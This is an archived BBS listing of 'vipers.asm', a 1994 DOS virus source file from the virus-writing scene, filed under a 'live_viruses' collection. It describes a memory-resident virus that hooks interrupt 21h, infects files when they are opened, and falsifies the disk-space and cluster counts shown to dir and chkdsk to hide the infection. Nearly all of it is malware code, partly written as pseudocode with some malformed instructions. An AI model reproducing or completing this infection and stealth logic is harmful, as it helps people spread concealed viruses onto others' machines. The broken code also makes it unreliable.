home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Unsorted BBS Collection
/
thegreatunsorted.tar
/
thegreatunsorted
/
live_viruses
/
virus_collections
/
vipers.asm
< prev
next >
Wrap
Assembly Source File
|
1994-04-30
|
4KB
|
127 lines
New Neat Stuff From The Vx...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
; Stealth.asm, idea and code written by <<-- Viper -->>
;
; function - To demonstrate a new form of stealth
; purpose - To actively monitor the infection of files, so that the
; total disk space reported can appear the same by a dir
; and other commands, as well as chkdsk reporting things such as
; allocation units, space, etc. the same...
;
; Note: This form of stealth works starting on memory residency, and i
; reset each reboot, or memory loss...
;
; Function Idea and Code written by <<-- Viper -->> for Rock Steady & [NuKE
; -------------------------------------------------------------------------
.model tiny
.radix 16
.code
org 100
virus:
check_if_installed
install_if_not_already (get, save, trace vectors and all other stuf
quit_to_host_program
21_handler:
cmp ah,3dh
je open
cmp ah,36
je NEW_STEALTH_PART2
; 3d 21_handler (infect_file on open) Just an example, could be done with
; anything (eg, close, 4b, etc...)
open:
open_file
save original bytes
infect file
jump if error --> fuckit
NEW_STEALTH_PART1: ; always do the stealth calcs right
; after a new file has been infected
push ax
push bx
push cx
etc...
mov ax,3600
xor dl,dl
call old21
; ax=sec/cluster, bx=available clusters, cx=bytes/sector, dx=total/clusters
mov cs:[rax],ax
mov cs:[rbx],bx
mov cs:[rcx],cx
mov cs:[rdx],dx
mul ax,cx ; this gives bytes/allocation unit
xchg ax,bx
mov dx,significant reg of filesize ; (saved from previous int)
mov ax,insignficant reg of filesize; (saved from previous int)
div bx ; ax = dx:ax=filesize / bx=bytes/alloc
cmp ax,0 ; ax = # of alloc units
je smaller_than_1_alloc
cmp dx,0
je exact_divide
inc ax
mul ax,bx ; dx:ax=largest # bytes b4 next cluster used
mov cx,significant reg of filesize
mov bx,insignificant reg of filesize ; cx:bx=filesize
sub dx,cx
sub ax,bx ; now dx:ax is left with 0:#bytes before next clust
mov bx,ax ; put ax into bx so that the same code can be used
; over...
jmp not_exact_divide_and_larger_than_0_allocs
exact_divide:
inc cs:[cluster_loss_due_to_infect] ; because our virus > 0 bytes
jmp fuckit ; were done our work (in this case, anyways)
smaller_than_1_alloc:
sub bx,dx
not_exact_divide_and_larger_than_0_allocs:
cmp bx,virus_size
jge fuckit ; no need for adjustment because virus is the same
; or smaller size than the # of bytes left in
; that available cluster
inc cs:[cluster_loss_due_to_infect]
fuckit:
etc...
pop cx
pop bx
pop ax
restore stuff (other registers, and callers program stuff)
iret
NEW_STEALTH_PART2:
call old21
add bx,cs:[cluster_loss_due_to_infect] ; lie about how many cluster
; used, and the space left
; on the hard drive...
iret
old21:
pushf
callf
old21vector dd ?
ret
rax dw ?
rbx dw ?
rcx dw ?
rdx dw ?
cluster_loss_due_to_infect dw 0
end_virus